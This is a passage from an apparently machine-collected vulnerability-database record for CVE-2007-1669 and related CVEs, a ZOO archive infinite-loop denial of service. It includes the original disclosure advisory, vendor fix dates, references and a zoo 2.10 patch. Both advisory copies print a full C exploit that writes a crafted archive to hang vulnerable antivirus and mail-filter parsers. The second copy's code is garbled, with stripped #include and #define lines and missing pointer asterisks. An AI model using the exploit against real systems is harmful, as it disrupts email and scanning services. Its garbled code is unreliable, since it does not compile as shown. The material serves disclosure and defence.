4.7.981, April 14th 2007. \n\no Avira AntiVir - CVE-2007-1671:\n   They fixed this problem in avpack32.dll version 7.3.0.6 March 22th 2007. \n\no zoo-2.10 - CVE-2007-1669:\n   This software is not maintained anymore.  A patch for version 2.10 is\n   provided in section VII of this advisory because some SMTP content\n   filters may still use this software. \n\no unzoo.c - CVE-2007-1673:\n   This software is not maintained anymore.  No patch is provided for this\n   software. \n\no WinAce was contacted but no response was received from them. \n\no PicoZip was contacted but no response was received from them. \n\n\nVI.     
PROOF OF CONCEPT\n\nUsing the PIRANA framework version 0.3.3, available at\nhttp://www.guay-leroux.com , it is possible to test your SMTP server\nagainst this vulnerability. \n\nAlternatively, here is an exploit that will create a file that will trigger\nthe infinite loop condition when it is processed. \n\n/*\n\nExploit for the vulnerability:\nMultiple vendors ZOO file decompression infinite loop DoS\n\ncoded by Jean-S\\xe9bastien Guay-Leroux\nSeptember 2006\n\n*/\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n\n// Structure of a ZOO header\n\n#define ZOO_HEADER_SIZE         0x0000002a\n\n#define ZH_TEXT                 0\n#define ZH_TAG                  20\n#define ZH_START_OFFSET         24\n#define ZH_NEG_START_OFFSET     28\n#define ZH_MAJ_VER              32\n#define ZH_MIN_VER              33\n#define ZH_ARC_HTYPE            34\n#define ZH_ARC_COMMENT          35\n#define ZH_ARC_COMMENT_LENGTH   39\n#define ZH_VERSION_DATA         41\n\n\n#define D_DIRENTRY_LENGTH       56\n\n#define D_TAG                   0\n#define D_TYPE                  4\n#define D_PACKING_METHOD        5\n#define D_NEXT_ENTRY            6\n#define D_OFFSET                10\n#define D_DATE                  14\n#define D_TIME                  16\n#define D_FILE_CRC              18\n#define D_ORIGINAL_SIZE         20\n#define D_SIZE_NOW              24\n#define D_MAJ_VER               28\n#define D_MIN_VER               29\n#define D_DELETED               30\n#define D_FILE_STRUCT           31\n#define D_COMMENT_OFFSET        32\n#define D_COMMENT_SIZE          36\n#define D_FILENAME              38\n#define D_VAR_DIR_LEN           51\n#define D_TIMEZONE              53\n#define D_DIR_CRC               54\n#define D_NAMLEN                ( D_DIRENTRY_LENGTH + 0 )\n#define D_DIRLEN                ( D_DIRENTRY_LENGTH + 1 )\n#define D_LFILENAME             ( D_DIRENTRY_LENGTH + 2 )\n\n\nvoid put_byte (char *ptr, unsigned char data) {\n         *ptr = data;\n}\n\nvoid 
put_word (char *ptr, unsigned short data) {\n         put_byte (ptr, data);\n         put_byte (ptr + 1, data >> 8);\n}\n\nvoid put_longword (char *ptr, unsigned long data) {\n         put_byte (ptr, data);\n         put_byte (ptr + 1, data >> 8);\n         put_byte (ptr + 2, data >> 16);\n         put_byte (ptr + 3, data >> 24);\n}\n\nFILE * open_file (char *filename) {\n\n         FILE *fp;\n\n         fp = fopen ( filename , \"w\" );\n\n         if (!fp) {\n                 perror (\"Cant open file\");\n                 exit (1);\n         }\n\n         return fp;\n}\n\nvoid usage (char *progname) {\n\n         printf (\"\\nTo use:\\n\");\n         printf (\"%s <archive name>\\n\\n\", progname);\n\n         exit (1);\n}\n\nint main (int argc, char *argv[]) {\n         FILE *fp;\n         char *hdr = (char *) malloc (4096);\n         char *filename = (char *) malloc (256);\n         int written_bytes;\n         int total_size;\n\n         if ( argc != 2) {\n                 usage ( argv[0] );\n         }\n\n         strncpy (filename, argv[1], 255);\n\n         if (!hdr || !filename) {\n                 perror (\"Error allocating memory\");\n                 exit (1);\n         }\n\n         memset (hdr, 0x00, 4096);\n\n         // Build a ZOO header\n         memcpy          (hdr + ZH_TEXT, \"ZOO 2.10 Archive.\\032\", 18);\n         put_longword    (hdr + ZH_TAG, 0xfdc4a7dc);\n         put_longword    (hdr + ZH_START_OFFSET, ZOO_HEADER_SIZE);\n         put_longword    (hdr + ZH_NEG_START_OFFSET,\n             (ZOO_HEADER_SIZE) * -1);\n         put_byte        (hdr + ZH_MAJ_VER, 2);\n         put_byte        (hdr + ZH_MIN_VER, 0);\n         put_byte        (hdr + ZH_ARC_HTYPE, 1);\n         put_longword    (hdr + ZH_ARC_COMMENT, 0);\n         put_word        (hdr + ZH_ARC_COMMENT_LENGTH, 0);\n         put_byte        (hdr + ZH_VERSION_DATA, 3);\n\n         // Build vulnerable direntry struct\n         put_longword    (hdr + ZOO_HEADER_SIZE + D_TAG, 0xfdc4a7dc);\n 
        put_byte        (hdr + ZOO_HEADER_SIZE + D_TYPE, 1);\n         put_byte        (hdr + ZOO_HEADER_SIZE + D_PACKING_METHOD, 0);\n         put_longword    (hdr + ZOO_HEADER_SIZE + D_NEXT_ENTRY, 0x2a);\n         put_longword    (hdr + ZOO_HEADER_SIZE + D_OFFSET, 0x71);\n         put_word        (hdr + ZOO_HEADER_SIZE + D_DATE, 0x3394);\n         put_word        (hdr + ZOO_HEADER_SIZE + D_TIME, 0x4650);\n         put_word        (hdr + ZOO_HEADER_SIZE + D_FILE_CRC, 0);\n         put_longword    (hdr + ZOO_HEADER_SIZE + D_ORIGINAL_SIZE, 0);\n         put_longword    (hdr + ZOO_HEADER_SIZE + D_SIZE_NOW, 0);\n         put_byte        (hdr + ZOO_HEADER_SIZE + D_MAJ_VER, 1);\n         put_byte        (hdr + ZOO_HEADER_SIZE + D_MIN_VER, 0);\n         put_byte        (hdr + ZOO_HEADER_SIZE + D_DELETED, 0);\n         put_byte        (hdr + ZOO_HEADER_SIZE + D_FILE_STRUCT, 0);\n         put_longword    (hdr + ZOO_HEADER_SIZE + D_COMMENT_OFFSET, 0);\n         put_word        (hdr + ZOO_HEADER_SIZE + D_COMMENT_SIZE, 0);\n         memcpy          (hdr + ZOO_HEADER_SIZE + D_FILENAME,\n                             \"AAAAAAAA.AAA\", 13);\n\n         total_size = ZOO_HEADER_SIZE + 51;\n\n         fp = open_file (filename);\n\n         if ( (written_bytes = fwrite ( hdr, 1, total_size, fp)) != 0 ) {\n                 printf (\"The file has been written\\n\");\n         } else {\n                 printf (\"Cant write to the file\\n\");\n                 exit (1);\n         }\n\n         fclose (fp);\n\n         return 0;\n}\n\n\nVII.    PATCH\n\nTo fix this issue, ensure that the offset of the next file to process is\nalways greater than the one you are currently processing.  This will\nguarantee the fact that it's not possible to process the same files over\nand over again.  
Here is a patch for the software zoo version 2.10\ndistributed with many UNIX systems:\n\n\ndiff -u zoo/zooext.c zoo-patched/zooext.c\n--- zoo/zooext.c        1991-07-11 15:08:00.000000000 -0400\n+++ zoo-patched/zooext.c        2007-03-16 16:45:28.000000000 -0500\n@@ -89,6 +89,7 @@\n  #endif\n  struct direntry direntry;                 /* directory entry */\n  int first_dir = 1;\n  /* first dir entry seen? */\n+unsigned long zoo_pointer = 0;                     /* Track our position\nin the file */\n\n  static char extract_ver[] = \"Zoo %d.%d is needed to extract %s.\\n\";\n  static char no_space[] = \"Insufficient disk space to extract %s.\\n\";\n@@ -169,6 +170,9 @@\n                 exit_status = 1;\n     }\n     zooseek (zoo_file, zoo_header.zoo_start, 0); /* seek to where data\n     begins */\n+\n+   /* Begin tracking our position in the file */\n+   zoo_pointer = zoo_header.zoo_start;\n  }\n\n  #ifndef PORTABLE\n@@ -597,6 +601,12 @@\n     } /* end if */\n\n  loop_again:\n+\n+   /* Make sure we are not seeking to already processed data */\n+   if (next_ptr <= zoo_pointer)\n+          prterror ('f', \"ZOO chain structure is corrupted\\n\");\n+   zoo_pointer = next_ptr;\n+\n     zooseek (zoo_file, next_ptr, 0); /* ..seek to next dir entry */\n  } /* end while */\n\ndiff -u zoo/zoolist.c zoo-patched/zoolist.c\n--- zoo/zoolist.c       1991-07-11 15:08:04.000000000 -0400\n+++ zoo-patched/zoolist.c       2007-03-16 16:45:20.000000000 -0500\n@@ -92,6 +92,7 @@\n  int show_mode = 0;                             /* show file protection */\n  #endif\n  int first_dir = 1;                             /* if first direntry -- to\n  adjust dat_ofs */\n+unsigned long zoo_pointer = 0;         /* Track our position in the file\n*/\n\n  while (*option) {\n     switch (*option) {\n@@ -211,6 +212,9 @@\n                 show_acmt (&zoo_header, zoo_file, 0);           /* show\n                 archive comment */\n         }\n\n+   /* Begin tracking our position in the file */\n+   
zoo_pointer = zoo_header.zoo_start;\n+\n     /* Seek to the beginning of the first directory entry */\n     if (zooseek (zoo_file, zoo_header.zoo_start, 0) != 0) {\n        ercount++;\n@@ -437,6 +441,11 @@\n           if (verb_list && !fast)\n              show_comment (&direntry, zoo_file, 0, (char *) NULL);\n        } /* end if (lots of conditions) */\n+\n+      /* Make sure we are not seeking to already processed data */\n+      if (direntry.next <= zoo_pointer)\n+               prterror ('f', \"ZOO chain structure is corrupted\\n\");\n+      zoo_pointer = direntry.next;\n\n                 /* ..seek to next dir entry */\n        zooseek (zoo_file, direntry.next, 0);\n\n\nVIII.   CREDITS\n\nJean-Sebastien Guay-Leroux found the bug and wrote the exploit for it. \n\n\nIX.     REFERENCES\n\n1. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1669\n\n2. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1670\n\n3. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1671\n\n4. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1672\n\n5. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1673\n\n\nX.      HISTORY\n\n2006-09-??  : Vulnerability is found\n2007-03-19  : All vendors notified\n2007-03-19  : Barracuda Networks provided a fix\n2007-03-22  : Avira provided a fix\n2007-04-02  : Panda Antivirus provided a fix\n2007-04-14  : avast! antivirus provided a fix\n2007-05-04  : Public disclosure\n",
      sources: [
         {
            db: "NVD",
            id: "CVE-2007-1669",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2007-001742",
         },
         {
            db: "BID",
            id: "23823",
         },
         {
            db: "VULHUB",
            id: "VHN-25031",
         },
         {
            db: "PACKETSTORM",
            id: "56548",
         },
         {
            db: "PACKETSTORM",
            id: "56479",
         },
      ],
      trust: 2.16,
   },
   exploit_availability: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            reference: "https://www.scap.org.cn/vuln/vhn-25031",
            trust: 0.1,
            type: "unknown",
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-25031",
         },
      ],
   },
   external_ids: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            db: "NVD",
            id: "CVE-2007-1669",
            trust: 2.9,
         },
         {
            db: "BID",
            id: "23823",
            trust: 2,
         },
         {
            db: "SECUNIA",
            id: "25122",
            trust: 1.8,
         },
         {
            db: "SECUNIA",
            id: "25315",
            trust: 1.7,
         },
         {
            db: "VUPEN",
            id: "ADV-2007-1699",
            trust: 1.7,
         },
         {
            db: "SREASON",
            id: "2680",
            trust: 1.7,
         },
         {
            db: "OSVDB",
            id: "35795",
            trust: 1.7,
         },
         {
            db: "JVNDB",
            id: "JVNDB-2007-001742",
            trust: 0.8,
         },
         {
            db: "XF",
            id: "34080",
            trust: 0.6,
         },
         {
            db: "BUGTRAQ",
            id: "20070504 MULTIPLE VENDORS ZOO FILE DECOMPRESSION INFINITE LOOP DOS",
            trust: 0.6,
         },
         {
            db: "VIM",
            id: "20070724 ZOO - AMAVIS - BARRACUDA CROSS-REF PROBLEMS",
            trust: 0.6,
         },
         {
            db: "CNNVD",
            id: "CNNVD-200705-120",
            trust: 0.6,
         },
         {
            db: "EXPLOIT-DB",
            id: "3851",
            trust: 0.1,
         },
         {
            db: "VULHUB",
            id: "VHN-25031",
            trust: 0.1,
         },
         {
            db: "PACKETSTORM",
            id: "56548",
            trust: 0.1,
         },
         {
            db: "PACKETSTORM",
            id: "56479",
            trust: 0.1,
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-25031",
         },
         {
            db: "BID",
            id: "23823",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2007-001742",
         },
         {
            db: "PACKETSTORM",
            id: "56548",
         },
         {
            db: "PACKETSTORM",
            id: "56479",
         },
         {
            db: "NVD",
            id: "CVE-2007-1669",
         },
         {
            db: "CNNVD",
            id: "CNNVD-200705-120",
         },
      ],
   },
   id: "VAR-200705-0183",
   iot: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: true,
      sources: [
         {
            db: "VULHUB",
            id: "VHN-25031",
         },
      ],
      trust: 0.01,
   },
   last_update_date: "2023-12-18T12:12:33.927000Z",
   patch: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/patch#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://amavis.org/",
         },
         {
            title: "Barracuda Spam & Virus Firewall",
            trust: 0.8,
            url: "http://www.barracudanetworks.com/ns/products/spam_overview.php",
         },
      ],
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2007-001742",
         },
      ],
   },
   problemtype_data: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            problemtype: "NVD-CWE-Other",
            trust: 1,
         },
         {
            problemtype: "CWE-DesignError",
            trust: 0.8,
         },
      ],
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2007-001742",
         },
         {
            db: "NVD",
            id: "CVE-2007-1669",
         },
      ],
   },
   references: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/references#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            trust: 1.7,
            url: "http://www.securityfocus.com/bid/23823",
         },
         {
            trust: 1.7,
            url: "http://www.amavis.org/security/asa-2007-2.txt",
         },
         {
            trust: 1.7,
            url: "http://www.osvdb.org/35795",
         },
         {
            trust: 1.7,
            url: "http://secunia.com/advisories/25122",
         },
         {
            trust: 1.7,
            url: "http://secunia.com/advisories/25315",
         },
         {
            trust: 1.7,
            url: "http://securityreason.com/securityalert/2680",
         },
         {
            trust: 1.7,
            url: "http://www.attrition.org/pipermail/vim/2007-july/001725.html",
         },
         {
            trust: 1.1,
            url: "http://www.securityfocus.com/archive/1/467646/100/0/threaded",
         },
         {
            trust: 1.1,
            url: "http://www.vupen.com/english/advisories/2007/1699",
         },
         {
            trust: 1.1,
            url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/34080",
         },
         {
            trust: 0.9,
            url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1669",
         },
         {
            trust: 0.8,
            url: "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2007-1669",
         },
         {
            trust: 0.6,
            url: "http://www.barracudanetworks.com/ns/products/spam_overview.php",
         },
         {
            trust: 0.6,
            url: "http://xforce.iss.net/xforce/xfdb/34080",
         },
         {
            trust: 0.6,
            url: "http://www.securityfocus.com/archive/1/archive/1/467646/100/0/threaded",
         },
         {
            trust: 0.6,
            url: "http://www.frsirt.com/english/advisories/2007/1699",
         },
         {
            trust: 0.3,
            url: "http://www.avast.com",
         },
         {
            trust: 0.3,
            url: "http://www.avira.com/",
         },
         {
            trust: 0.3,
            url: "http://www.pandasoftware.com/",
         },
         {
            trust: 0.3,
            url: "http://www.picozip.com/",
         },
         {
            trust: 0.3,
            url: "http://www.winace.com/",
         },
         {
            trust: 0.3,
            url: "/archive/1/467646",
         },
         {
            trust: 0.3,
            url: "http://archives.math.utk.edu/software/multi-platform/gap/util/unzoo.c",
         },
         {
            trust: 0.1,
            url: "http://www.barracudanetworks.com/ns/resources/tech_alert.php",
         },
         {
            trust: 0.1,
            url: "http://secunia.com/secunia_security_advisories/",
         },
         {
            trust: 0.1,
            url: "http://secunia.com/network_software_inspector/",
         },
         {
            trust: 0.1,
            url: "http://www.guay-leroux.com/projects/zoo-infinite-advisory.txt",
         },
         {
            trust: 0.1,
            url: "http://secunia.com/product/4639/",
         },
         {
            trust: 0.1,
            url: "http://secunia.com/advisories/25122/",
         },
         {
            trust: 0.1,
            url: "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org",
         },
         {
            trust: 0.1,
            url: "http://secunia.com/about_secunia_advisories/",
         },
         {
            trust: 0.1,
            url: "http://www.guay-leroux.com",
         },
         {
            trust: 0.1,
            url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1673",
         },
         {
            trust: 0.1,
            url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1671",
         },
         {
            trust: 0.1,
            url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1672",
         },
         {
            trust: 0.1,
            url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1670",
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-25031",
         },
         {
            db: "BID",
            id: "23823",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2007-001742",
         },
         {
            db: "PACKETSTORM",
            id: "56548",
         },
         {
            db: "PACKETSTORM",
            id: "56479",
         },
         {
            db: "NVD",
            id: "CVE-2007-1669",
         },
         {
            db: "CNNVD",
            id: "CNNVD-200705-120",
         },
      ],
   },
   sources: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            db: "VULHUB",
            id: "VHN-25031",
         },
         {
            db: "BID",
            id: "23823",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2007-001742",
         },
         {
            db: "PACKETSTORM",
            id: "56548",
         },
         {
            db: "PACKETSTORM",
            id: "56479",
         },
         {
            db: "NVD",
            id: "CVE-2007-1669",
         },
         {
            db: "CNNVD",
            id: "CNNVD-200705-120",
         },
      ],
   },
   sources_release_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2007-05-09T00:00:00",
            db: "VULHUB",
            id: "VHN-25031",
         },
         {
            date: "2007-05-04T00:00:00",
            db: "BID",
            id: "23823",
         },
         {
            date: "2012-06-26T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2007-001742",
         },
         {
            date: "2007-05-10T00:32:46",
            db: "PACKETSTORM",
            id: "56548",
         },
         {
            date: "2007-05-04T16:51:04",
            db: "PACKETSTORM",
            id: "56479",
         },
         {
            date: "2007-05-09T00:19:00",
            db: "NVD",
            id: "CVE-2007-1669",
         },
         {
            date: "2007-05-08T00:00:00",
            db: "CNNVD",
            id: "CNNVD-200705-120",
         },
      ],
   },
   sources_update_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2018-10-16T00:00:00",
            db: "VULHUB",
            id: "VHN-25031",
         },
         {
            date: "2016-07-06T14:39:00",
            db: "BID",
            id: "23823",
         },
         {
            date: "2012-06-26T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2007-001742",
         },
         {
            date: "2018-10-16T16:40:20.380000",
            db: "NVD",
            id: "CVE-2007-1669",
         },
         {
            date: "2007-05-10T00:00:00",
            db: "CNNVD",
            id: "CNNVD-200705-120",
         },
      ],
   },
   threat_type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "remote",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-200705-120",
         },
      ],
      trust: 0.6,
   },
   title: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/title#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Barracuda Spam Firewall Used in etc.  zoo decoder Service disruption in  (DoS) Vulnerabilities",
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2007-001742",
         },
      ],
      trust: 0.8,
   },
   type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Design Error",
      sources: [
         {
            db: "BID",
            id: "23823",
         },
         {
            db: "CNNVD",
            id: "CNNVD-200705-120",
         },
      ],
      trust: 0.9,
   },
}

var-200705-0187
Vulnerability from variot

unzoo.c, as used in multiple products including AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file. The Zoo compression algorithm is prone to a remote denial-of-service vulnerability. This issue arises when applications implementing the Zoo algorithm process certain malformed archives. A successful attack can exhaust system resources and trigger a denial-of-service condition. This issue affects Zoo 2.10 and other applications implementing the vulnerable algorithm. Topic: Multiple vendors ZOO file decompression infinite loop DoS

Announced: 2007-05-04
Credits: Jean-Sebastien Guay-Leroux
Products: Multiple (see section III)
Impact: DoS (99% CPU utilisation)
CVE ID: CVE-2007-1669, CVE-2007-1670, CVE-2007-1671, CVE-2007-1672, CVE-2007-1673

I. BACKGROUND

Zoo is a compression program and format developed by Rahul Dhesi in the mid 1980s. The format is based on the LZW compression algorithm and compressed files are identified by the .zoo file extension.

II. The vulnerability lies in the algorithm used to locate the files inside the archive. Each file in a ZOO archive is identified by a direntry structure. These structures are linked to one another by a 'next' pointer, which is in fact an offset from the beginning of the file that gives the position of the next direntry structure. If that offset points to an entry that has already been processed, the same entry is processed more than once, and the ZOO parser enters an infinite loop.

III. AFFECTED SOFTWARE

o Barracuda Spam Firewall
o Panda Software Antivirus
o avast! antivirus
o Avira AntiVir
o zoo-2.10
o unzoo.c
o WinAce
o PicoZip

IV. IMPACT

If this attack is conducted against a vulnerable antivirus, the host system will have its CPU at 100% utilization and may have problems answering other requests.

If this attack is conducted against an SMTP content filter running a vulnerable ZOO implementation, legitimate clients may be unable to send and receive email through this server.

V. SOLUTION

o Barracuda Spam Firewall - CVE-2007-1669: They fixed this problem in virusdef 2.0.6399 for firmware >= 3.4 and 2.0.6399o for firmware < 3.4 March 19th 2007.

o Panda Software Antivirus - CVE-2007-1670: They fixed this problem April 2nd 2007.

o avast! antivirus - CVE-2007-1672: They fixed this problem in version 4.7.981, April 14th 2007.

o Avira AntiVir - CVE-2007-1671: They fixed this problem in avpack32.dll version 7.3.0.6 March 22nd 2007.

o zoo-2.10 - CVE-2007-1669: This software is not maintained anymore. A patch for version 2.10 is provided in section VII of this advisory because some SMTP content filters may still use this software.

o unzoo.c - CVE-2007-1673: This software is not maintained anymore. No patch is provided for this software.

o WinAce was contacted but no response was received from them.

o PicoZip was contacted but no response was received from them.

VI. PROOF OF CONCEPT

Using the PIRANA framework version 0.3.3, available at http://www.guay-leroux.com , it is possible to test your SMTP server against this vulnerability.

Alternatively, here is an exploit that will create a file that will trigger the infinite loop condition when it is processed.

/*

Exploit for the vulnerability: Multiple vendors ZOO file decompression infinite loop DoS

coded by Jean-Sébastien Guay-Leroux September 2006

*/

include

include

include

// Structure of a ZOO header

define ZOO_HEADER_SIZE 0x0000002a

define ZH_TEXT 0

define ZH_TAG 20

define ZH_START_OFFSET 24

define ZH_NEG_START_OFFSET 28

define ZH_MAJ_VER 32

define ZH_MIN_VER 33

define ZH_ARC_HTYPE 34

define ZH_ARC_COMMENT 35

define ZH_ARC_COMMENT_LENGTH 39

define ZH_VERSION_DATA 41

define D_DIRENTRY_LENGTH 56

define D_TAG 0

define D_TYPE 4

define D_PACKING_METHOD 5

define D_NEXT_ENTRY 6

define D_OFFSET 10

define D_DATE 14

define D_TIME 16

define D_FILE_CRC 18

define D_ORIGINAL_SIZE 20

define D_SIZE_NOW 24

define D_MAJ_VER 28

define D_MIN_VER 29

define D_DELETED 30

define D_FILE_STRUCT 31

define D_COMMENT_OFFSET 32

define D_COMMENT_SIZE 36

define D_FILENAME 38

define D_VAR_DIR_LEN 51

define D_TIMEZONE 53

define D_DIR_CRC 54

define D_NAMLEN ( D_DIRENTRY_LENGTH + 0 )

define D_DIRLEN ( D_DIRENTRY_LENGTH + 1 )

define D_LFILENAME ( D_DIRENTRY_LENGTH + 2 )

// Single-byte helper that put_word and put_longword build on.
// NOTE(review): this line looks garbled by extraction; confirm against the original advisory.
void put_byte (char ptr, unsigned char data) { ptr = data; }

// Emits a 16-bit value as two put_byte calls: the low byte at ptr, then the
// high byte (data >> 8) at ptr + 1, i.e. least significant byte first.
void put_word (char *ptr, unsigned short data) { put_byte (ptr, data); put_byte (ptr + 1, data >> 8); }

// Emits the low 32 bits of data as four put_byte calls at ptr .. ptr + 3,
// shifting by 0, 8, 16 and 24 bits, i.e. least significant byte first.
void put_longword (char *ptr, unsigned long data) { put_byte (ptr, data); put_byte (ptr + 1, data >> 8); put_byte (ptr + 2, data >> 16); put_byte (ptr + 3, data >> 24); }

// Opens filename for writing and returns the stream.
// On failure it prints the error with perror and terminates the process with
// exit status 1, so callers never see a NULL return.
FILE * open_file (char *filename) {

     FILE *fp;

     // Mode "w": the file is created or truncated and opened in text mode.
     fp = fopen ( filename , "w" );

     if (!fp) {
             perror ("Cant open file");
             exit (1);
     }

     return fp;

}

// Prints the one-argument command-line synopsis for progname and terminates
// the process with exit status 1; it does not return to the caller.
void usage (char *progname) {

     printf ("\nTo use:\n");
     printf ("%s <archive name>\n\n", progname);

     exit (1);

}

// Builds a zeroed 4096-byte buffer holding a ZOO archive header plus one
// directory entry, then writes the first ZOO_HEADER_SIZE + 51 bytes of it to
// the file named by argv[1]. Exits with status 1 on a usage, allocation, open
// or write failure; returns 0 otherwise.
// NOTE(review): the declaration line below looks garbled by extraction;
// confirm against the original advisory.
int main (int argc, char argv[]) { FILE fp; char hdr = (char ) malloc (4096); char filename = (char ) malloc (256); int written_bytes; int total_size;

     // Exactly one argument (the output archive name) is required.
     if ( argc != 2) {
             usage ( argv[0] );
     }

     // Copies at most 255 bytes of argv[1]; note that this runs before the
     // allocation check that follows.
     strncpy (filename, argv[1], 255);

     if (!hdr || !filename) {
             perror ("Error allocating memory");
             exit (1);
     }

     // Every field that is not set explicitly below stays zero.
     memset (hdr, 0x00, 4096);

     // Build a ZOO header
     memcpy          (hdr + ZH_TEXT, "ZOO 2.10 Archive.\032", 18);
     put_longword    (hdr + ZH_TAG, 0xfdc4a7dc);
     // Start offset of the first directory entry: directly after the header.
     put_longword    (hdr + ZH_START_OFFSET, ZOO_HEADER_SIZE);
     put_longword    (hdr + ZH_NEG_START_OFFSET,
         (ZOO_HEADER_SIZE) * -1);
     put_byte        (hdr + ZH_MAJ_VER, 2);
     put_byte        (hdr + ZH_MIN_VER, 0);
     put_byte        (hdr + ZH_ARC_HTYPE, 1);
     put_longword    (hdr + ZH_ARC_COMMENT, 0);
     put_word        (hdr + ZH_ARC_COMMENT_LENGTH, 0);
     put_byte        (hdr + ZH_VERSION_DATA, 3);

     // Build vulnerable direntry struct
     put_longword    (hdr + ZOO_HEADER_SIZE + D_TAG, 0xfdc4a7dc);
     put_byte        (hdr + ZOO_HEADER_SIZE + D_TYPE, 1);
     put_byte        (hdr + ZOO_HEADER_SIZE + D_PACKING_METHOD, 0);
     // The next-entry offset is 0x2a, the same value as ZOO_HEADER_SIZE, i.e.
     // the offset at which this entry itself is placed. This self-reference is
     // the malformed chain described in section II; the fix in section VII
     // rejects any next offset that is not greater than the current position.
     put_longword    (hdr + ZOO_HEADER_SIZE + D_NEXT_ENTRY, 0x2a);
     put_longword    (hdr + ZOO_HEADER_SIZE + D_OFFSET, 0x71);
     put_word        (hdr + ZOO_HEADER_SIZE + D_DATE, 0x3394);
     put_word        (hdr + ZOO_HEADER_SIZE + D_TIME, 0x4650);
     put_word        (hdr + ZOO_HEADER_SIZE + D_FILE_CRC, 0);
     put_longword    (hdr + ZOO_HEADER_SIZE + D_ORIGINAL_SIZE, 0);
     put_longword    (hdr + ZOO_HEADER_SIZE + D_SIZE_NOW, 0);
     put_byte        (hdr + ZOO_HEADER_SIZE + D_MAJ_VER, 1);
     put_byte        (hdr + ZOO_HEADER_SIZE + D_MIN_VER, 0);
     put_byte        (hdr + ZOO_HEADER_SIZE + D_DELETED, 0);
     put_byte        (hdr + ZOO_HEADER_SIZE + D_FILE_STRUCT, 0);
     put_longword    (hdr + ZOO_HEADER_SIZE + D_COMMENT_OFFSET, 0);
     put_word        (hdr + ZOO_HEADER_SIZE + D_COMMENT_SIZE, 0);
     memcpy          (hdr + ZOO_HEADER_SIZE + D_FILENAME,
                         "AAAAAAAA.AAA", 13);

     // Only the header and the first 51 bytes of the entry are written out.
     total_size = ZOO_HEADER_SIZE + 51;

     fp = open_file (filename);

     // fwrite's return value is only compared with 0, so a partial write also
     // takes the success branch.
     if ( (written_bytes = fwrite ( hdr, 1, total_size, fp)) != 0 ) {
             printf ("The file has been written\n");
     } else {
             printf ("Cant write to the file\n");
             exit (1);
     }

     fclose (fp);

     return 0;

}

VII. PATCH

To fix this issue, ensure that the offset of the next file to process is always greater than the offset of the one currently being processed. Because the offsets then strictly increase, the same entry can never be processed twice, so the parser cannot loop over the same files again and again. Here is a patch for the software zoo version 2.10 distributed with many UNIX systems:

